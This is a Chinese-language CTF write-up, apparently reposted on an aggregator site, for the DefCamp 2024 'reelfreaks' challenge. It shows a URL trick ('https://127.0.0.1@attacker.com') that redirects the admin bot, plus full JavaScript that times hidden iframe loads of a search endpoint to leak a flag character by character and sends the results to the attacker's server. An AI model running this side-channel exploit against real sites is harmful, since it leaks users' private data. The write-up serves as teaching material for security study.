当前位置: 首页 > news >正文

CSRF攻击 + 观测iframe加载时间利用时间响应差异侧信道攻击 -- reelfreaks DefCamp 2024

参考: https://0x90r00t.com/2024/09/30/3708/

题目信息

有些事情最好还是保持低调。当然,除非你是个真正的怪胎。
注意:该网站通过HTTPS提供服务
标志格式:DCTF{}

题目实现了一个类似视频网站的东西

在其提供的数据库中我们能看到被ban的视频,其名称为flag的值

被ban的东西只能由管理员查看

if movie.banned != False and current_user.role != 'real_freak':movies.pop(i)

此处存在我们可以控制的url

# 定义报告路由,处理 POST 请求,需要登录才能访问
@main.route('/report', methods=['POST'])
@login_required
def report():# 构建访问的 URLurl = "https://127.0.0.1" + request.form.get('movie')# 创建一个新线程,调用 visit 函数访问该 URLthread = threading.Thread(target=visit,args=(url,))# 启动线程thread.start()return 'OK'

我们可以构造类似如下的有效负载

https://127.0.0.1@attacker.com

当大文件被加载,其会产生一定的延迟,我们可以使用iframe观测其加载完成的时间

参考: https://0x90r00t.com/2024/09/30/3708/

<body></body>
<script type="text/javascript">
// 定义所有可能用于破解flag的候选字符集(注意:字符 `_` 缺失,`` 可能存在排版错误)
const characters = '| !"#$&\'()*+,-./0123456789:;<=>?@[\\]^``abcdefghijklmnopqrstuvwxyz{}~';// 存储每个字符的响应时间测量结果
let timings = {};// 当前猜测的flag(初始值为占位flag,实际会通过时间分析逐步破解)
let currentFlag = 'DCTF{l3ak_ev3ry_d4y_0f_ev3ry_w33k}';// 当前正在测试的字符索引(按characters顺序遍历)
let charIndex = 0;// 最大测试轮次(初始值为0,可能需要调整以增加准确性)
let maxRounds = 0;// 根据记录的响应时间对字符排序(降序,时间越长排越前)
function getSortedKeysByTiming(timings) {return Object.keys(timings).sort((a, b) => timings[b] - timings[a]);
}// 向服务器发送日志(用于远程记录测试数据)
function log(message) {const xhr = new XMLHttpRequest();xhr.open("GET", "/?" + message); // 将数据通过GET参数发送xhr.send();
}/*** 测量特定字符组合的响应时间* @param {string} char - 当前测试的字符* @param {string} flag - 当前猜测的完整flag(包含已确定字符+测试字符)*/
function measureTiming(char, flag) {// 通过隐藏的iframe发起请求,测量加载时间const iframe = document.createElement('iframe');// 请求本地服务器接口,q参数携带猜测的flagiframe.src = 'https://127.0.0.1:5000/watchlist?q=' + encodeURIComponent(flag);document.body.appendChild(iframe);const startTime = performance.now(); // 记录精确的时间起点// 根据iframe加载结果更新计时数据iframe.onload = () => updateTiming(char, performance.now() - startTime);iframe.onerror = () => updateTiming(char, -1); // 错误时记录-1
}/*** 更新字符计时数据并继续处理* @param {string} char - 被测试的字符* @param {number} time - 测量的响应时间(毫秒)*/
function updateTiming(char, time) {// 仅保留最大时间值(假设正确字符会触发更长响应)if (!(char in timings) || time > timings[char]) {timings[char] = time;}log(`${char}: ${time}`); // 发送日志clearFrames();           // 清理iframeprocessNextChar();       // 处理下一个字符
}// 清除所有iframe防止内存泄漏
function clearFrames() {document.body.innerHTML = ''; // 清空body内所有内容
}/*** 主逻辑:按顺序测试每个字符,完成一轮后分析结果*/
function processNextChar() {// 遍历所有候选字符if (charIndex < characters.length) {const currentChar = characters[charIndex];// 测试当前猜测flag+当前字符的组合(例如:"DCTF{a")measureTiming(currentChar, currentFlag + currentChar);charIndex++;} else {// 一轮完成,按响应时间排序字符const sortedKeys = getSortedKeysByTiming(timings);log('fini ' + sortedKeys.join(',')); // 上报结果// 如果还有剩余轮次,重置索引继续测试(可能需要多轮验证)if (maxRounds-- > 0) {charIndex = 0;processNextChar();}}
}// 启动时间攻击
processNextChar();
</script>
http://www.xdnf.cn/news/466849.html

相关文章:

  • 第一天的尝试
  • C语言中的指定初始化器
  • java 八股
  • Opencv C++写中文(来自Gemini)
  • uniapp+vite+cli模板引入tailwindcss
  • 智慧鱼塘可视化管理:养殖业数字孪生
  • [IMX] 02.GPIO 寄存器
  • Electron 应用的升级机制详解
  • 文科生如何重新开始学习数学?
  • OGSM 从上到下逐级分解策略:从战略目标到部门计划的标准化落地路径
  • 使用 frp 实现内网穿透:从基础到进阶
  • 司法系统之外的第三方平台未经许可披露企业涉诉信息是否构成侵权
  • 学前数学思维:整体代换
  • 深度解析:如何用DeepSeek等大模型增强MySQL运维效率
  • 访问 Docker 官方镜像源(包括代理)全部被“重置连接”或超时
  • Linux系统中部署java服务(docker)
  • WSF3089 N沟道MOSFET在按摩椅中的应用分析
  • SpringBoot 3.4.5版本导入Lomobok依赖后无法生效的问题
  • 软件设计师考试《综合知识》设计模式之——工厂模式与抽象工厂模式考点分析
  • Windows软件插件-写MP4
  • 极验验证码全套接口(无感,滑块,点字,点图,语序,推理,九宫格)
  • UR5e机器人Matlab仿真
  • UI自动化测试方案详解
  • SpringAOP
  • k8s(12) — 版本控制和滚动更新(金丝雀部署理念)
  • [IP地址科普] 服务器公网IP、私网IP、弹性IP是什么?区别与应用场景详解
  • [吾爱出品] pdf提取工具,文本、表格、图片提取
  • LLM笔记(三)位置编码(1)
  • java中XML的使用
  • 工业大数据的定义